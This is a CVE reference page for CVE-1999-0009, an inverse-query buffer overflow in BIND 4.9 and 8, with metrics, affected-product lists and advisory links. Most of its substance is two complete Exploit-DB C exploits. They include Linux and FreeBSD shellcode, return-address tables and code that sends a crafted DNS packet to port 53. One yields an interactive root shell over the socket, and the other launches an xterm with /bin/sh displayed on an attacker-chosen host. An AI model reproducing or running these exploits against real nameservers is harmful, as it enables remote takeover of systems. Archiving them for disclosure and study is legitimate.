CVE-1999-0009

EPSS

9.01%V3

Vector

Network

Published

1999-09-29 02:00 +00:00

Last Modified

2009-03-01 23:00 +00:00

Official links

CVE.org

NVD

Alert for a CVE

Stay informed of any changes for a specific CVE.

Alert management

List of Alerts

Alert for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2024-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

Descriptions

Inverse query buffer overflow in BIND 4.9 and BIND 8 Releases.

Informations

Metrics

Metric	Score	Severity	CVSS Vector	Source
V2	10		AV:N/AC:L/Au:N/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 19111

Publication date : 1998-04-07 22:00 +00:00
Author : ROTShB
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/134/info A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host. Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list. */ /* * have fun. * -ROTShB */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define DEFAULT_TARGET 0 #define DEFAULT_OPTIMIZATION 0 #define DEFAULT_ANBUF_OFFSET 300 #define DLEN_VAL 4 #define NPACKETSZ 512 #define NMAXDNAME 1025 #define PRE_EGG_DATALEN (1+(sizeof(short)*3)+sizeof(long)) #define ALEN_VAL (DLEN_VAL+PRE_EGG_DATALEN) #define BUFFSIZE 4096 struct target_type { char desc[40]; int systype; unsigned long addr; unsigned long opt_addr; int fd; }; struct target_type target[] = { {"x86 Linux 2.0.x named 4.9.5-REL (se)",0,0xbffff21c,0xbffff23c,4}, {"x86 Linux 2.0.x named 4.9.5-REL (le)",0,0xbfffeedc,0xbfffeefc,4}, {"x86 Linux 2.0.x named 4.9.5-P1 (se)",0,0xbffff294,0xbffff2cc,4}, {"x86 Linux 2.0.x named 4.9.5-P1 (le)",0,0xbfffef8c,0xbfffefb4,4}, {"x86 Linux 2.0.x named 4.9.6-REL (se)",0,0xbffff3e3,0xbffff403,4}, {"x86 Linux 2.0.x named 4.9.6-REL (le)",0,0xbffff188,0xbffff194,4}, {"x86 Linux 2.0.x named 8.1-REL (se)",0,0xbffff6a4,0xbffff6f8,5}, {"x86 Linux 2.0.x named 8.1-REL (le)",0,0xbffff364,0xbffff3b8,5}, {"x86 Linux 2.0.x named 8.1.1 (se)",0,0xbffff6b8,0xbffff708,5}, {"x86 Linux 2.0.x named 8.1.1 (le)",0,0xbffff378,0xbffff3c8,5}, {"x86 FreeBSD 3.x named 4.9.5-REL (se)",1,0xefbfd260,0xefbfd2c8,4}, {"x86 FreeBSD 3.x named 4.9.5-REL (le)",1,0xefbfd140,0xefbfd1a8,4}, {"x86 FreeBSD 3.x named 4.9.5-P1 (se)",1,0xefbfd260,0xefbfd2c8,4}, {"x86 FreeBSD 3.x named 4.9.5-P1 (le)",1,0xefbfd140,0xefbfd1a8,4}, {"x86 FreeBSD 3.x named 4.9.6-REL (se)",1,0xefbfd480,0xefbfd4e8,4}, {"x86 FreeBSD 3.x named 4.9.6-REL (le)",1,0xefbfd218,0xefbfd274,4}, {{0},0,0,0,0} }; unsigned long resolve(char *host) { long i; struct hostent *he; if((i=inet_addr(host))==(-1)) if((he=gethostbyname(host))==NULL) return(0); else return(*(unsigned long *)he->h_addr); return(i); } int send_packet(int fd, char *buff, int len) { char tmp[2], *ptr=tmp; PUTSHORT(len,ptr); if(write(fd,tmp,2)!=2) return(-1); if(write(fd,buff,len)!=len) return(-1); return(1); } int attack(int fd, struct target_type t, unsigned long offset, int optimized) { char buff[BUFFSIZE], *ptr=buff; HEADER *dnsh=(HEADER *)buff; unsigned long i; int dlen, len=0; (void)memset(dnsh,0,sizeof(HEADER)); dnsh->id = htons(31337); dnsh->opcode = IQUERY; dnsh->rd = 1; dnsh->ra = 1; dnsh->ancount = htons(1); ptr += sizeof(HEADER); len += sizeof(HEADER); *ptr = '\0'; ptr++; i = T_A; PUTSHORT(i,ptr); i = C_IN; PUTSHORT(i,ptr); i = 31337; PUTLONG(i,ptr); if(t.systype==0) { char c0de[] = "\x31\xc0\xb0\x3f\x31\xdb\xb3\xff\x31\xc9\xcd\x80\x31\xc0\xb0\x3f\xb1" "\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd\x80\xeb\x24\x5e\x8d\x1e\x89" "\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10" "\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7" "\xff\xff\xff/bin/sh"; if(optimized) dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN; else dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN; PUTSHORT(dlen,ptr); len += PRE_EGG_DATALEN; c0de[7] = t.fd; (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff))); i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de); (void)memcpy((ptr+i),c0de,sizeof(c0de)); if(!optimized) { (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de)); i = ALEN_VAL; (void)memcpy((ptr+(dlen-16)),&i,sizeof(i)); i = DLEN_VAL; (void)memcpy((ptr+(dlen-12)),&i,sizeof(i)); } else (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de)); i = (optimized?t.opt_addr:t.addr)+offset; len += dlen; } else if(t.systype==1) { char c0de[] = "\xeb\x6e\x5e\xc6\x06\x9a\x31\xc9\x89\x4e\x01\xc6\x46\x05\x07\x88" "\x4e\x06\x51\x31\xdb\xb3\x04\x53\x66\xc7\x46\x07\xeb\xa7\x31\xc0" "\xb0\x5a\x50\xeb\x50\xfe\xc1\x51\x53\xc6\x46\x08\xb6\x31\xc0\xb0" "\x5a\x50\xeb\x41\xfe\xc1\x51\x53\xc6\x46\x08\xc5\x31\xc0\xb0\x5a" "\x50\xeb\x32\xc7\x46\x07\x2f\x62\x69\x6e\xc7\x46\x0b\x2f\x73\x68" "\x21\x31\xc0\x88\x46\x0e\x8d\x5e\x07\x89\x5e\x0f\x89\x46\x13\x8d" "\x5e\x13\x53\x8d\x5e\x0f\x53\x8d\x5e\x07\x53\xb0\x3b\x50\xeb\x05" "\xe8\x8d\xff\xff\xff"; if(optimized) dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN; else dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN; PUTSHORT(dlen,ptr); len += PRE_EGG_DATALEN; c0de[22] = t.fd; (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff))); i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de); (void)memcpy((ptr+i),c0de,sizeof(c0de)); if(!optimized) { (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de)); i = ALEN_VAL; (void)memcpy((ptr+(dlen-16)),&i,sizeof(i)); i = DLEN_VAL; (void)memcpy((ptr+(dlen-12)),&i,sizeof(i)); } else (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de)); i = (optimized?t.opt_addr:t.addr)+offset; (void)memcpy((ptr+(dlen-4)),&i,sizeof(i)); len += dlen; } else return(0); return(send_packet(fd,buff,len)); } int main(int argc, char *argv[]) { char xbuf[128], ybuf[128]; unsigned long offset=DEFAULT_ANBUF_OFFSET; int ti, opt=DEFAULT_OPTIMIZATION, sock, i; int xlen=0, ylen=0; fd_set rd, wr; struct sockaddr_in sa; for(i=0;((target[i].addr)||(target[i].opt_addr));i++); if(argc<2) { (void)fprintf(stderr,"\ntarget types:\n"); for(ti=0;ti [tt] [opt] [ofst]\n", argv[0]); exit(-1); } if(argc>2) { ti = atoi(argv[2]); if((ti<0)||(ti>i)) { (void)fprintf(stderr,"error: invalid target type %d\n",ti); exit(-1); } } else ti = DEFAULT_TARGET; if(argc>3) { opt = atoi(argv[3]); if((opt!=0)&&(opt!=1)) { (void)fprintf(stderr,"error: invalid optimization setting %d\n",opt); exit(-1); } } if(argc>4) offset = atoi(argv[4]); if(!(sa.sin_addr.s_addr=resolve(argv[1]))) { (void)fprintf(stderr,"error: can not resolve: %s\n",argv[1]); exit(-1); } sa.sin_family = AF_INET; sa.sin_port = htons(53); if((sock=socket(sa.sin_family,SOCK_STREAM,0))==(-1)) { (void)perror("error: socket"); exit(-1); } if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1)) { (void)perror("error: connect"); exit(-1); } (void)printf("target : %s\n",inet_ntoa(sa.sin_addr)); (void)printf("target type : %s\n",target[ti].desc); (void)printf("optimized named : %s\n",(opt?"YES":"NO")); (void)printf("anbuff addr : 0x%x\n",(unsigned int) (i=(opt?target[ti].opt_addr:target[ti].addr))); (void)printf("anbuff addr offset : %lu\n",offset); (void)printf("ret addr : 0x%x\n",(unsigned int)(i+offset)); (void)printf("fd to make dups of : %d\n",target[ti].fd); (void)printf("here we go...\n"); switch(attack(sock,target[ti],offset,opt)) { case -1: (void)perror("error: attack"); exit(-1); break; case 0: (void)fprintf(stderr,"error: internal error\n"); exit(-1); break; } (void)printf("have fun.\n"); (void)printf("-ROTShB\n"); while(1) { FD_ZERO(&rd); if(ylen<(sizeof(ybuf)-1)) FD_SET(sock,&rd); if(xlen<(sizeof(xbuf)-1)) FD_SET(fileno(stdin),&rd); FD_ZERO(&wr); if(xlen) FD_SET(sock,&wr); if(ylen) FD_SET(fileno(stdout),&wr); if((ti=select((sock+1),&rd,&wr,NULL,NULL))==(-1)) { (void)perror("error: select"); break; } if(FD_ISSET(fileno(stdin),&rd)) { if((i=read(fileno(stdin),(xbuf+xlen),(sizeof(xbuf)-xlen)))==(-1)) { (void)perror("error: read"); exit(-1); } else if(i==0) break; xlen += i; if(!(--ti)) continue; } if(FD_ISSET(sock,&wr)) { if(write(sock,xbuf,xlen)!=xlen) { (void)perror("error: write"); exit(-1); } xlen = 0; if(!(--ti)) continue; } if(FD_ISSET(sock,&rd)) { if((i=read(sock,(ybuf+ylen),(sizeof(ybuf)-ylen)))==(-1)) { (void)perror("error: read"); exit(-1); } else if(i==0) break; ylen += i; if(!(--ti)) continue; } if(FD_ISSET(fileno(stdout),&wr)) { if(write(fileno(stdout),ybuf,ylen)!=ylen) { (void)perror("error: write"); exit(-1); } ylen = 0; if(!(--ti)) continue; } } if(close(sock)==(-1)) { (void)perror("error: close"); exit(-1); } exit(0); }

Exploit Database EDB-ID : 19112

Publication date : 1998-04-07 22:00 +00:00
Author : prym
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/134/info A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host. Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list. */ /* * z, thnx. * ganked the xterm exec from adm, thnx. * have fun. * -prym */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define REMOTE #define DEFAULT_ANBUF_OFFSET 300 #define DEFAULT_TARGET 0 #define DEFAULT_OPTIMIZED 0 #define DLEN_VAL 4 #define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long)) #define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN) #define EVILSPACE (PACKETSZ-PRE_OF_DATALEN) #define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN) #define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN) struct target_type { char desc[40]; int systype; unsigned long addr; unsigned long opt_addr; }; struct target_type target[] = { {"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4}, {"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194}, {"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c}, {"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c}, {"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8}, {{0},0,0,0} }; unsigned long resolve(char *host) { long i; struct hostent *he; if((i=inet_addr(host))<0) if((he=gethostbyname(host))==NULL) return(0); else return(*(unsigned long *)he->h_addr); return(i); } int send_packet(int fd, char *buff, int len) { char tmp[2], *ptr=tmp; PUTSHORT(len,ptr); if(write(fd,tmp,2)!=2) return(-1); if(write(fd,buff,len)!=len) return(-1); return(1); } int attack(int fd, struct in_addr us, struct target_type t, unsigned long offset, int optimized) { char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff; HEADER *dnsh=(HEADER *)buff; unsigned long i; int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL; memset(dnsh,0,sizeof(HEADER)); dnsh->id = htons(31337); dnsh->opcode = IQUERY; dnsh->rd = 1; dnsh->ra = 1; dnsh->ancount = htons(1); ptr += sizeof(HEADER); len += sizeof(HEADER); *ptr = '\0'; ptr++; PUTSHORT(T_A,ptr); PUTSHORT(C_IN,ptr); PUTLONG(31337,ptr); dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4; PUTSHORT(dlen,ptr); len += PRE_OF_DATALEN; memset(ptr,'X',(sizeof(buff)-(ptr-buff))); if(t.systype==0) { #ifdef REMOTE char c1[] = "\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74" "\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f" "\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd" "\x80\xe8\xcc\xff\xff\xff"; char c2[] = "/usr/bin/X11/xterm\xff-display\xff"; char c3[32]; char c4[] = "\xfe\xe8\xb1\xff\xff\xff"; snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us)); c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3); c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3); i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4); memset(ptr,0x90,i); memcpy((ptr+i),c1,strlen(c1)); memcpy((ptr+i+strlen(c1)),c2,strlen(c2)); memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3)); memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4)); #else char c0de[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi"; int i = EVILSPACE-strlen(c0de); memset(ptr,0x90,i); memcpy((ptr+i),c0de,strlen(c0de)); #endif } else return(0); if(!optimized) { memcpy((ptr+(dlen-16)),&al,sizeof(al)); memcpy((ptr+(dlen-12)),&dl,sizeof(dl)); } i = (optimized?t.opt_addr:t.addr)+offset; memcpy((ptr+(dlen-4)),&i,sizeof(i)); len += dlen; return(send_packet(fd,buff,len)); } int main(int argc, char *argv[]) { unsigned long offset=DEFAULT_ANBUF_OFFSET; int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i; struct sockaddr_in sa; struct in_addr xs; for(i=0;target[i].desc[0];i++); if(argc<3) { fprintf(stderr,"\ntarget types:\n"); fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf", "description"); for(target_index=0;target_index [tt] [opt] [offset]\n", argv[0]); exit(-1); } if((argc>3)&&((target_index=atoi(argv[3]))>=i)) { fprintf(stderr,"error: invalid target type %d\n",target_index); exit(-1); } if((target[target_index].addr==0)&&(target[target_index].opt_addr==0)) { fprintf(stderr,"error: internal error\n"); exit(-1); } if(argc>4) { optimized = atoi(argv[4]); if((optimized!=0)&&(optimized!=1)) { fprintf(stderr,"error: invalid optimization setting %d\n",optimized); exit(-1); } } if((optimized==0)&&(target[target_index].addr==0)) optimized = 1; if((optimized==1)&&(target[target_index].opt_addr==0)) optimized = 0; if(argc>5) offset = atoi(argv[5]); if(!(xs.s_addr=resolve(argv[2]))) { fprintf(stderr,"error: can not resolve: %s\n",argv[2]); exit(-1); } if(!(sa.sin_addr.s_addr=resolve(argv[1]))) { fprintf(stderr,"error: can not resolve: %s\n",argv[1]); exit(-1); } sa.sin_family = AF_INET; sa.sin_port = htons(53); if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1)) { perror("error: socket"); exit(-1); } if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1)) { perror("error: connect"); exit(-1); } printf("target : %s\n",inet_ntoa(sa.sin_addr)); printf("target type : %s\n",target[target_index].desc); printf("optimized named : %s\n",(optimized?"YES":"NO")); printf("anbuff addr : 0x%x\n",(unsigned int) (optimized?target[target_index].opt_addr:target[target_index].addr)); printf("anbuff addr offset : %lu\n",offset); printf("xterm display dest : %s:0\n",inet_ntoa(xs)); printf("exploiting . . .\n"); switch(attack(sock,xs,target[target_index],offset,optimized)) { case -1: perror("error: attack"); return(-1); break; case 0: fprintf(stderr,"error: internal error\n"); return(-1); break; } if(close(sock)!=0) { perror("error: close"); return(-1); } exit(0); }

Products Mentioned

Configuraton 0

Data_general>>Dg_ux >> Version 5.4_3.0

Data_general>>Dg_ux >> Version 5.4_3.1

Data_general>>Dg_ux >> Version 5.4_4.1

Data_general>>Dg_ux >> Version 5.4_4.11

Isc>>Bind >> Version 4.9.6

Isc>>Bind >> Version 4.9.6 (Open CPE detail)
Isc>>Bind >> Version 4.9.6 (Open CPE detail)

Isc>>Bind >> Version 8.1

Isc>>Bind >> Version 8.1 (Open CPE detail)
Isc>>Bind >> Version 8.1 (Open CPE detail)

Isc>>Bind >> Version 8.1.1

Isc>>Bind >> Version 8.1.1 (Open CPE detail)
Isc>>Bind >> Version 8.1.1 (Open CPE detail)

Sgi>>Irix >> Version 3.2

Sgi>>Irix >> Version 3.3

Sgi>>Irix >> Version 3.3.1

Sgi>>Irix >> Version 3.3.2

Sgi>>Irix >> Version 3.3.3

Sgi>>Irix >> Version 4.0

Sgi>>Irix >> Version 4.0.1

Sgi>>Irix >> Version 4.0.1 (Open CPE detail)

Sgi>>Irix >> Version 4.0.1t

Sgi>>Irix >> Version 4.0.1t (Open CPE detail)

Sgi>>Irix >> Version 4.0.2

Sgi>>Irix >> Version 4.0.2 (Open CPE detail)

Sgi>>Irix >> Version 4.0.3

Sgi>>Irix >> Version 4.0.3 (Open CPE detail)

Sgi>>Irix >> Version 4.0.4

Sgi>>Irix >> Version 4.0.4 (Open CPE detail)

Sgi>>Irix >> Version 4.0.4b

Sgi>>Irix >> Version 4.0.4b (Open CPE detail)

Sgi>>Irix >> Version 4.0.4t

Sgi>>Irix >> Version 4.0.4t (Open CPE detail)

Sgi>>Irix >> Version 4.0.5

Sgi>>Irix >> Version 4.0.5 (Open CPE detail)

Sgi>>Irix >> Version 4.0.5_iop

Sgi>>Irix >> Version 4.0.5_iop (Open CPE detail)

Sgi>>Irix >> Version 4.0.5_ipr

Sgi>>Irix >> Version 4.0.5a

Sgi>>Irix >> Version 4.0.5a (Open CPE detail)

Sgi>>Irix >> Version 4.0.5d

Sgi>>Irix >> Version 4.0.5d (Open CPE detail)

Sgi>>Irix >> Version 4.0.5e

Sgi>>Irix >> Version 4.0.5e (Open CPE detail)

Sgi>>Irix >> Version 4.0.5f

Sgi>>Irix >> Version 4.0.5f (Open CPE detail)

Sgi>>Irix >> Version 4.0.5g

Sgi>>Irix >> Version 4.0.5g (Open CPE detail)

Sgi>>Irix >> Version 4.0.5h

Sgi>>Irix >> Version 4.0.5h (Open CPE detail)

Sgi>>Irix >> Version 5.0

Sgi>>Irix >> Version 5.0.1

Sgi>>Irix >> Version 5.0.1 (Open CPE detail)

Sgi>>Irix >> Version 5.1

Sgi>>Irix >> Version 5.1 (Open CPE detail)

Sgi>>Irix >> Version 5.1.1

Sgi>>Irix >> Version 5.1.1 (Open CPE detail)

Sgi>>Irix >> Version 5.2

Sgi>>Irix >> Version 5.2 (Open CPE detail)

Sgi>>Irix >> Version 5.3

Sgi>>Irix >> Version 5.3 (Open CPE detail)
Sgi>>Irix >> Version 5.3 (Open CPE detail)

Sgi>>Irix >> Version 6.0

Sgi>>Irix >> Version 6.0 (Open CPE detail)

Sgi>>Irix >> Version 6.1

Sgi>>Irix >> Version 6.1 (Open CPE detail)

Sgi>>Irix >> Version 6.2

Sgi>>Irix >> Version 6.2 (Open CPE detail)

Sgi>>Irix >> Version 6.3

Sgi>>Irix >> Version 6.3 (Open CPE detail)

Configuraton 0

Bsdi>>Bsd_os >> Version 2.0

Bsdi>>Bsd_os >> Version 2.0 (Open CPE detail)

Bsdi>>Bsd_os >> Version 2.0.1

Bsdi>>Bsd_os >> Version 2.0.1 (Open CPE detail)

Bsdi>>Bsd_os >> Version 2.1

Bsdi>>Bsd_os >> Version 2.1 (Open CPE detail)

Caldera>>Openlinux >> Version 1.0

Ibm>>Aix >> Version 4.1

Ibm>>Aix >> Version 4.1 (Open CPE detail)

Ibm>>Aix >> Version 4.1.1

Ibm>>Aix >> Version 4.1.1 (Open CPE detail)

Ibm>>Aix >> Version 4.1.2

Ibm>>Aix >> Version 4.1.2 (Open CPE detail)

Ibm>>Aix >> Version 4.1.3

Ibm>>Aix >> Version 4.1.3 (Open CPE detail)

Ibm>>Aix >> Version 4.1.4

Ibm>>Aix >> Version 4.1.4 (Open CPE detail)

Ibm>>Aix >> Version 4.1.5

Ibm>>Aix >> Version 4.1.5 (Open CPE detail)

Ibm>>Aix >> Version 4.2

Ibm>>Aix >> Version 4.2 (Open CPE detail)

Ibm>>Aix >> Version 4.2.1

Ibm>>Aix >> Version 4.2.1 (Open CPE detail)

Ibm>>Aix >> Version 4.3

Ibm>>Aix >> Version 4.3 (Open CPE detail)

Nec>>Asl_ux_4800 >> Version 64

Netbsd>>Netbsd >> Version 1.0

Netbsd>>Netbsd >> Version 1.0 (Open CPE detail)

Netbsd>>Netbsd >> Version 1.1

Netbsd>>Netbsd >> Version 1.1 (Open CPE detail)

Netbsd>>Netbsd >> Version 1.2

Netbsd>>Netbsd >> Version 1.2 (Open CPE detail)

Netbsd>>Netbsd >> Version 1.2.1

Netbsd>>Netbsd >> Version 1.2.1 (Open CPE detail)

Netbsd>>Netbsd >> Version 1.3

Netbsd>>Netbsd >> Version 1.3 (Open CPE detail)

Netbsd>>Netbsd >> Version 1.3.1

Netbsd>>Netbsd >> Version 1.3.1 (Open CPE detail)

Redhat>>Linux >> Version 4.0

Redhat>>Linux >> Version 4.0 (Open CPE detail)

Redhat>>Linux >> Version 4.1

Redhat>>Linux >> Version 4.1 (Open CPE detail)

Redhat>>Linux >> Version 4.2

Redhat>>Linux >> Version 4.2 (Open CPE detail)

Redhat>>Linux >> Version 5.0

Redhat>>Linux >> Version 5.0 (Open CPE detail)

Sco>>Open_desktop >> Version 3.0

Sco>>Open_desktop >> Version 5.0

Sco>>Unixware >> Version 2.1

Sco>>Unixware >> Version 7.0

Sun>>Solaris >> Version 2.5

Sun>>Solaris >> Version 2.5.1

Sun>>Solaris >> Version 2.6

Sun>>Solaris >> Version 2.6 (Open CPE detail)
Sun>>Solaris >> Version 2.6 (Open CPE detail)
Sun>>Solaris >> Version 2.6 (Open CPE detail)
Sun>>Solaris >> Version 2.6 (Open CPE detail)
Sun>>Solaris >> Version 2.6 (Open CPE detail)

Sun>>Sunos >> Version -

Sun>>Sunos >> Version - (Open CPE detail)

Sun>>Sunos >> Version 5.3

Sun>>Sunos >> Version 5.3 (Open CPE detail)

Sun>>Sunos >> Version 5.4

Sun>>Sunos >> Version 5.4 (Open CPE detail)

Sun>>Sunos >> Version 5.5

Sun>>Sunos >> Version 5.5 (Open CPE detail)

Sun>>Sunos >> Version 5.5.1

Sun>>Sunos >> Version 5.5.1 (Open CPE detail)

References

ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
Tags : vendor-advisory, x_refsource_SGI

http://www.securityfocus.com/bid/134
Tags : vdb-entry, x_refsource_BID

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9808-083
Tags : vendor-advisory, x_refsource_HP

http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180
Tags : vendor-advisory, x_refsource_SUN

Lists Vulnerabilities

Sorted by Year

CVE Statistics

Specific Views

Vendors List

Products List

Lists CWE

Specific Views

Lasts 7 CWE

Lists CAPEC

Specifics Views

7 Lasts CAPEC

CVE-1999-0009

Alert for a CVE

Functionality requiring a connection

Descriptions

Informations

Metrics

EPSS

EPSS Score

EPSS Percentile

Exploit information

Exploit Database EDB-ID : 19111

Exploit Database EDB-ID : 19112

Products Mentioned

Configuraton 0

Configuraton 0

References

Lists Vulnerabilities

Sorted by Year

CVE Statistics

Specific Views

CVE

OWASP

CISA KEV

Vendors List

Products List

Lists CWE

Specific Views

Lasts 7 CWE

Lists CAPEC

Specifics Views

7 Lasts CAPEC

No result found

Alert System

CVE-1999-0009 : Detail

CVE-1999-0009

Alert for a CVE

Descriptions

Informations

Metrics

EPSS

EPSS Score

EPSS Percentile

Exploit information

Exploit Database EDB-ID : 19111

Exploit Database EDB-ID : 19112

Products Mentioned

Configuraton 0

Configuraton 0

References